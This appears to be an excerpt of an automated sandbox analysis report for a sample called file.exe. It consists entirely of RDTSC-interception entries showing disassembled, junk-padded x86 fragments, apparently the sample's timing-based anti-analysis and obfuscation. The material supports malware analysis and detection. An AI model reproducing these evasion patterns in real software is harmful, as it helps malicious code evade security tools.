                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B262 second address: E4B268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B53D second address: E4B541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B541 second address: E4B564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F47DCFB8A42h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B564 second address: CA1C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push dword ptr [ebp+122D1711h] 0x0000000d add dword ptr [ebp+122D2B90h], edx 0x00000013 call dword ptr [ebp+122D2B9Bh] 0x00000019 pushad 0x0000001a jmp 00007F47DD40FB7Eh 0x0000001f stc 0x00000020 xor eax, eax 0x00000022 mov dword ptr [ebp+122D2A10h], ebx 0x00000028 mov edx, dword ptr [esp+28h] 0x0000002c cmc 0x0000002d mov dword ptr [ebp+122D2F36h], eax 0x00000033 pushad 0x00000034 jmp 00007F47DD40FB88h 0x00000039 jnp 00007F47DD40FB78h 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 mov dword ptr [ebp+122D2A10h], eax 0x00000048 mov esi, 0000003Ch 0x0000004d sub dword ptr [ebp+122D3984h], ebx 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 sub dword ptr [ebp+122D2B79h], edx 0x0000005d cmc 0x0000005e lodsw 0x00000060 mov dword ptr [ebp+122D3984h], edi 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a jl 00007F47DD40FB7Ch 0x00000070 or dword ptr [ebp+122D1A7Ch], eax 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a jnl 00007F47DD40FB84h 0x00000080 nop 0x00000081 jnc 00007F47DD40FB84h 0x00000087 push eax 0x00000088 pushad 0x00000089 push eax 0x0000008a push edx 0x0000008b jmp 00007F47DD40FB80h 0x00000090 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B68D second address: E4B694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B694 second address: E4B6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007F47DD40FB80h 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jbe 00007F47DD40FB76h 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push edx 0x00000020 jnl 00007F47DD40FB78h 0x00000026 pop edx 0x00000027 mov eax, dword ptr [eax] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e jmp 00007F47DD40FB7Bh 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B6DB second address: E4B6FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F47DCFB8A36h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F47DCFB8A3Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B6FB second address: E4B786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [ebp+122D3B06h], edx 0x00000010 call 00007F47DD40FB79h 0x00000015 jmp 00007F47DD40FB87h 0x0000001a push eax 0x0000001b jmp 00007F47DD40FB89h 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 jmp 00007F47DD40FB80h 0x00000029 mov eax, dword ptr [eax] 0x0000002b jmp 00007F47DD40FB80h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F47DD40FB7Fh 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B87E second address: E4B89C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c popad 0x0000000d xchg eax, esi 0x0000000e mov edi, dword ptr [ebp+122D2DFEh] 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F47DCFB8A36h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4BFAB second address: E4BFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4BFAF second address: E4C00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F47DCFB8A36h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edi 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop edi 0x0000001a nop 0x0000001b mov ecx, dword ptr [ebp+122D2CDAh] 0x00000021 sub edi, 02BD80DCh 0x00000027 push 0000001Eh 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F47DCFB8A38h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 mov cx, ax 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jc 00007F47DCFB8A36h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C39E second address: E4C404 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47DD40FB78h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F47DD40FB78h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov ecx, ebx 0x0000002b lea eax, dword ptr [ebp+1247CD89h] 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F47DD40FB78h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b mov dx, bx 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 jo 00007F47DD40FB7Ch 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C404 second address: E4C408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C408 second address: E4C45E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007F47DD40FB7Ah 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D39ACh], eax 0x00000017 lea eax, dword ptr [ebp+1247CD45h] 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F47DD40FB78h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 push eax 0x00000038 push eax 0x00000039 pushad 0x0000003a push esi 0x0000003b pop esi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C45E second address: E324B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx edi, di 0x0000000c call dword ptr [ebp+122D3A28h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jbe 00007F47DCFB8A36h 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E324B7 second address: E324BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E324BB second address: E324D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F47DCFB8A44h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E324D5 second address: E324DF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47DD40FB7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B965 second address: E8B985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F47DCFB8A46h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B985 second address: E8B98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B98F second address: E8B9A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F47DCFB8A36h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BC93 second address: E8BC9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F47DD40FB76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BC9F second address: E8BCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BCA3 second address: E8BCAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93AC1 second address: E93ADB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47DCFB8A42h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93EAE second address: E93EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9406F second address: E94073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94073 second address: E9407D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9407D second address: E94095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Eh 0x00000007 je 00007F47DCFB8A36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94095 second address: E940A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F47DD40FB76h 0x00000009 jbe 00007F47DD40FB76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9432A second address: E94333 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94333 second address: E9433A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94634 second address: E94638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E948E8 second address: E948FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F47DD40FB76h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F47DD40FB76h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E948FA second address: E948FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9892E second address: E98942 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F47DD40FB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F47DD40FB7Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98ABE second address: E98ACE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47DCFB8A36h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98D60 second address: E98D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B576 second address: E9B582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F47DCFB8A36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B582 second address: E9B5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 je 00007F47DD40FB76h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F47DD40FB86h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B5B0 second address: E9B5B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B5B6 second address: E9B5BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B140 second address: E9B146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B146 second address: E9B14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B14B second address: E9B155 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47DCFB8A4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B2DE second address: E9B2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F47DD40FB7Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA00FB second address: EA00FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA00FF second address: EA0120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47DD40FB89h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA0120 second address: EA0139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A45h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E05DA4 second address: E05DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E05DAA second address: E05DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E05DB8 second address: E05DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB87h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F874 second address: E9F87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FE48 second address: E9FE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FE4D second address: E9FE59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F47DCFB8A36h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA5DA1 second address: EA5DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA466D second address: EA468E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DCFB8A44h 0x00000009 popad 0x0000000a jnc 00007F47DCFB8A47h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA468E second address: EA469D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB7Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA469D second address: EA46C1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F47DCFB8A3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F47DCFB8A40h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA498E second address: EA499A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47DD40FB76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4F1A second address: EA4F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F47DCFB8A36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4F24 second address: EA4F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F47DD40FB76h 0x0000000e jmp 00007F47DD40FB87h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4F49 second address: EA4F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E23A second address: E0E240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E240 second address: E0E244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E244 second address: E0E26E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F47DD40FB85h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E26E second address: E0E2A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F47DCFB8A6Ah 0x0000000e jns 00007F47DCFB8A50h 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F47DCFB8A36h 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E2A6 second address: E0E2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9218 second address: EA921E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA921E second address: EA923C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F47DD40FB86h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9A94 second address: EA9A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9A98 second address: EA9A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9A9E second address: EA9AA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9AA3 second address: EA9ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F47DD40FB76h 0x0000000a jmp 00007F47DD40FB82h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 jo 00007F47DD40FB76h 0x00000019 jmp 00007F47DD40FB7Ch 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9ADD second address: EA9AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9AE3 second address: EA9AFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47DD40FB82h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9AFF second address: EA9B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9B03 second address: EA9B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9B0D second address: EA9B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB0306 second address: EB030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB030A second address: EB0310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB08E7 second address: EB0903 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F47DD40FB87h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB0903 second address: EB090D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB0C05 second address: EB0C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2013 second address: EB2019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB577B second address: EB5792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB7Fh 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
